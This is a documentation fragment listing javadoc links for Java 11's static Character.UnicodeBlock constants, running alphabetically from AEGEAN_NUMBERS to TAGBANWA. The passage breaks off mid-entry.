-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#AEGEAN_NUMBERS[AEGEAN_NUMBERS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ALCHEMICAL_SYMBOLS[ALCHEMICAL_SYMBOLS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ALPHABETIC_PRESENTATION_FORMS[ALPHABETIC_PRESENTATION_FORMS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ANCIENT_GREEK_MUSICAL_NOTATION[ANCIENT_GREEK_MUSICAL_NOTATION]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ANCIENT_GREEK_NUMBERS[ANCIENT_GREEK_NUMBERS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ANCIENT_SYMBOLS[ANCIENT_SYMBOLS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARABIC[ARABIC]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARABIC_EXTENDED_A[ARABIC_EXTENDED_A]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARABIC_MATHEMATICAL_ALPHABETIC_SYMBOLS[ARABIC_MATHEMATICAL_ALPHABETIC_SYMBOLS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARABIC_PRESENTATION_FORMS_A[ARABIC_PRESENTATION_FORMS_A]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARABIC_PRESENTATION_FORMS_B[ARABIC_PRESENTATION_FORMS_B]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARABIC_SUPPLEMENT[ARABIC_SUPPLEMENT]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARMENIAN[ARMENIAN]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARROWS[ARROWS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#AVESTAN[AVESTAN]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BALINESE[BALINESE]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BAMUM[BAMUM]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BAMUM_SUPPLEMENT[BAMUM_SUPPLEMENT]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BASIC_LATIN[BASIC_LATIN]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BATAK[BATAK]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BENGALI[BENGALI]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BLOCK_ELEMENTS[BLOCK_ELEMENTS] -* static Character.UnicodeBlock 
{java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BOPOMOFO[BOPOMOFO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BOPOMOFO_EXTENDED[BOPOMOFO_EXTENDED] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BOX_DRAWING[BOX_DRAWING] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BRAHMI[BRAHMI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BRAILLE_PATTERNS[BRAILLE_PATTERNS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BUGINESE[BUGINESE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BUHID[BUHID] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BYZANTINE_MUSICAL_SYMBOLS[BYZANTINE_MUSICAL_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CARIAN[CARIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CHAKMA[CHAKMA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CHAM[CHAM] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CHEROKEE[CHEROKEE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_COMPATIBILITY[CJK_COMPATIBILITY] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_COMPATIBILITY_FORMS[CJK_COMPATIBILITY_FORMS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_COMPATIBILITY_IDEOGRAPHS[CJK_COMPATIBILITY_IDEOGRAPHS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_COMPATIBILITY_IDEOGRAPHS_SUPPLEMENT[CJK_COMPATIBILITY_IDEOGRAPHS_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_RADICALS_SUPPLEMENT[CJK_RADICALS_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_STROKES[CJK_STROKES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_SYMBOLS_AND_PUNCTUATION[CJK_SYMBOLS_AND_PUNCTUATION] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_UNIFIED_IDEOGRAPHS[CJK_UNIFIED_IDEOGRAPHS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_UNIFIED_IDEOGRAPHS_EXTENSION_A[CJK_UNIFIED_IDEOGRAPHS_EXTENSION_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_UNIFIED_IDEOGRAPHS_EXTENSION_B[CJK_UNIFIED_IDEOGRAPHS_EXTENSION_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_UNIFIED_IDEOGRAPHS_EXTENSION_C[CJK_UNIFIED_IDEOGRAPHS_EXTENSION_C] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_UNIFIED_IDEOGRAPHS_EXTENSION_D[CJK_UNIFIED_IDEOGRAPHS_EXTENSION_D] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COMBINING_DIACRITICAL_MARKS[COMBINING_DIACRITICAL_MARKS] -* static Character.UnicodeBlock 
{java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COMBINING_DIACRITICAL_MARKS_SUPPLEMENT[COMBINING_DIACRITICAL_MARKS_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COMBINING_HALF_MARKS[COMBINING_HALF_MARKS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COMBINING_MARKS_FOR_SYMBOLS[COMBINING_MARKS_FOR_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COMMON_INDIC_NUMBER_FORMS[COMMON_INDIC_NUMBER_FORMS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CONTROL_PICTURES[CONTROL_PICTURES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COPTIC[COPTIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COUNTING_ROD_NUMERALS[COUNTING_ROD_NUMERALS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CUNEIFORM[CUNEIFORM] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CUNEIFORM_NUMBERS_AND_PUNCTUATION[CUNEIFORM_NUMBERS_AND_PUNCTUATION] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CURRENCY_SYMBOLS[CURRENCY_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CYPRIOT_SYLLABARY[CYPRIOT_SYLLABARY] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CYRILLIC[CYRILLIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CYRILLIC_EXTENDED_A[CYRILLIC_EXTENDED_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CYRILLIC_EXTENDED_B[CYRILLIC_EXTENDED_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CYRILLIC_SUPPLEMENTARY[CYRILLIC_SUPPLEMENTARY] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#DESERET[DESERET] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#DEVANAGARI[DEVANAGARI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#DEVANAGARI_EXTENDED[DEVANAGARI_EXTENDED] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#DINGBATS[DINGBATS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#DOMINO_TILES[DOMINO_TILES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#EGYPTIAN_HIEROGLYPHS[EGYPTIAN_HIEROGLYPHS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#EMOTICONS[EMOTICONS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ENCLOSED_ALPHANUMERICS[ENCLOSED_ALPHANUMERICS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ENCLOSED_ALPHANUMERIC_SUPPLEMENT[ENCLOSED_ALPHANUMERIC_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ENCLOSED_CJK_LETTERS_AND_MONTHS[ENCLOSED_CJK_LETTERS_AND_MONTHS] -* static Character.UnicodeBlock 
{java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ENCLOSED_IDEOGRAPHIC_SUPPLEMENT[ENCLOSED_IDEOGRAPHIC_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ETHIOPIC[ETHIOPIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ETHIOPIC_EXTENDED[ETHIOPIC_EXTENDED] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ETHIOPIC_EXTENDED_A[ETHIOPIC_EXTENDED_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ETHIOPIC_SUPPLEMENT[ETHIOPIC_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GENERAL_PUNCTUATION[GENERAL_PUNCTUATION] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GEOMETRIC_SHAPES[GEOMETRIC_SHAPES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GEORGIAN[GEORGIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GEORGIAN_SUPPLEMENT[GEORGIAN_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GLAGOLITIC[GLAGOLITIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GOTHIC[GOTHIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GREEK[GREEK] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GREEK_EXTENDED[GREEK_EXTENDED] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GUJARATI[GUJARATI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#GURMUKHI[GURMUKHI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HALFWIDTH_AND_FULLWIDTH_FORMS[HALFWIDTH_AND_FULLWIDTH_FORMS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HANGUL_COMPATIBILITY_JAMO[HANGUL_COMPATIBILITY_JAMO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HANGUL_JAMO[HANGUL_JAMO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HANGUL_JAMO_EXTENDED_A[HANGUL_JAMO_EXTENDED_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HANGUL_JAMO_EXTENDED_B[HANGUL_JAMO_EXTENDED_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HANGUL_SYLLABLES[HANGUL_SYLLABLES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HANUNOO[HANUNOO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HEBREW[HEBREW] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HIGH_PRIVATE_USE_SURROGATES[HIGH_PRIVATE_USE_SURROGATES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HIGH_SURROGATES[HIGH_SURROGATES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#HIRAGANA[HIRAGANA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#IDEOGRAPHIC_DESCRIPTION_CHARACTERS[IDEOGRAPHIC_DESCRIPTION_CHARACTERS] -* 
static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#IMPERIAL_ARAMAIC[IMPERIAL_ARAMAIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#INSCRIPTIONAL_PAHLAVI[INSCRIPTIONAL_PAHLAVI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#INSCRIPTIONAL_PARTHIAN[INSCRIPTIONAL_PARTHIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#IPA_EXTENSIONS[IPA_EXTENSIONS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#JAVANESE[JAVANESE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KAITHI[KAITHI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KANA_SUPPLEMENT[KANA_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KANBUN[KANBUN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KANGXI_RADICALS[KANGXI_RADICALS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KANNADA[KANNADA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KATAKANA[KATAKANA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KATAKANA_PHONETIC_EXTENSIONS[KATAKANA_PHONETIC_EXTENSIONS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KAYAH_LI[KAYAH_LI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KHAROSHTHI[KHAROSHTHI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KHMER[KHMER] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#KHMER_SYMBOLS[KHMER_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LAO[LAO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LATIN_1_SUPPLEMENT[LATIN_1_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LATIN_EXTENDED_A[LATIN_EXTENDED_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LATIN_EXTENDED_ADDITIONAL[LATIN_EXTENDED_ADDITIONAL] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LATIN_EXTENDED_B[LATIN_EXTENDED_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LATIN_EXTENDED_C[LATIN_EXTENDED_C] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LATIN_EXTENDED_D[LATIN_EXTENDED_D] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LEPCHA[LEPCHA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LETTERLIKE_SYMBOLS[LETTERLIKE_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LIMBU[LIMBU] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LINEAR_B_IDEOGRAMS[LINEAR_B_IDEOGRAMS] -* static Character.UnicodeBlock 
{java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LINEAR_B_SYLLABARY[LINEAR_B_SYLLABARY] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LISU[LISU] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LOW_SURROGATES[LOW_SURROGATES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LYCIAN[LYCIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#LYDIAN[LYDIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MAHJONG_TILES[MAHJONG_TILES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MALAYALAM[MALAYALAM] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MANDAIC[MANDAIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MATHEMATICAL_ALPHANUMERIC_SYMBOLS[MATHEMATICAL_ALPHANUMERIC_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MATHEMATICAL_OPERATORS[MATHEMATICAL_OPERATORS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MEETEI_MAYEK[MEETEI_MAYEK] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MEETEI_MAYEK_EXTENSIONS[MEETEI_MAYEK_EXTENSIONS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MEROITIC_CURSIVE[MEROITIC_CURSIVE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MEROITIC_HIEROGLYPHS[MEROITIC_HIEROGLYPHS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MIAO[MIAO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MISCELLANEOUS_MATHEMATICAL_SYMBOLS_A[MISCELLANEOUS_MATHEMATICAL_SYMBOLS_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MISCELLANEOUS_MATHEMATICAL_SYMBOLS_B[MISCELLANEOUS_MATHEMATICAL_SYMBOLS_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MISCELLANEOUS_SYMBOLS[MISCELLANEOUS_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MISCELLANEOUS_SYMBOLS_AND_ARROWS[MISCELLANEOUS_SYMBOLS_AND_ARROWS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MISCELLANEOUS_SYMBOLS_AND_PICTOGRAPHS[MISCELLANEOUS_SYMBOLS_AND_PICTOGRAPHS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MISCELLANEOUS_TECHNICAL[MISCELLANEOUS_TECHNICAL] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MODIFIER_TONE_LETTERS[MODIFIER_TONE_LETTERS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MONGOLIAN[MONGOLIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MUSICAL_SYMBOLS[MUSICAL_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MYANMAR[MYANMAR] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#MYANMAR_EXTENDED_A[MYANMAR_EXTENDED_A] -* static Character.UnicodeBlock 
{java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#NEW_TAI_LUE[NEW_TAI_LUE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#NKO[NKO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#NUMBER_FORMS[NUMBER_FORMS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OGHAM[OGHAM] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OLD_ITALIC[OLD_ITALIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OLD_PERSIAN[OLD_PERSIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OLD_SOUTH_ARABIAN[OLD_SOUTH_ARABIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OLD_TURKIC[OLD_TURKIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OL_CHIKI[OL_CHIKI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OPTICAL_CHARACTER_RECOGNITION[OPTICAL_CHARACTER_RECOGNITION] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ORIYA[ORIYA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#OSMANYA[OSMANYA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PHAGS_PA[PHAGS_PA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PHAISTOS_DISC[PHAISTOS_DISC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PHOENICIAN[PHOENICIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PHONETIC_EXTENSIONS[PHONETIC_EXTENSIONS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PHONETIC_EXTENSIONS_SUPPLEMENT[PHONETIC_EXTENSIONS_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PLAYING_CARDS[PLAYING_CARDS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#PRIVATE_USE_AREA[PRIVATE_USE_AREA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#REJANG[REJANG] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#RUMI_NUMERAL_SYMBOLS[RUMI_NUMERAL_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#RUNIC[RUNIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SAMARITAN[SAMARITAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SAURASHTRA[SAURASHTRA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SHARADA[SHARADA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SHAVIAN[SHAVIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SINHALA[SINHALA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SMALL_FORM_VARIANTS[SMALL_FORM_VARIANTS] -* static Character.UnicodeBlock 
{java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SORA_SOMPENG[SORA_SOMPENG] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SPACING_MODIFIER_LETTERS[SPACING_MODIFIER_LETTERS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SPECIALS[SPECIALS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUNDANESE[SUNDANESE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUNDANESE_SUPPLEMENT[SUNDANESE_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPERSCRIPTS_AND_SUBSCRIPTS[SUPERSCRIPTS_AND_SUBSCRIPTS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPPLEMENTAL_ARROWS_A[SUPPLEMENTAL_ARROWS_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPPLEMENTAL_ARROWS_B[SUPPLEMENTAL_ARROWS_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPPLEMENTAL_MATHEMATICAL_OPERATORS[SUPPLEMENTAL_MATHEMATICAL_OPERATORS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPPLEMENTAL_PUNCTUATION[SUPPLEMENTAL_PUNCTUATION] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPPLEMENTARY_PRIVATE_USE_AREA_A[SUPPLEMENTARY_PRIVATE_USE_AREA_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SUPPLEMENTARY_PRIVATE_USE_AREA_B[SUPPLEMENTARY_PRIVATE_USE_AREA_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SYLOTI_NAGRI[SYLOTI_NAGRI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#SYRIAC[SYRIAC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAGALOG[TAGALOG] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAGBANWA[TAGBANWA] -* static Character.UnicodeBlock 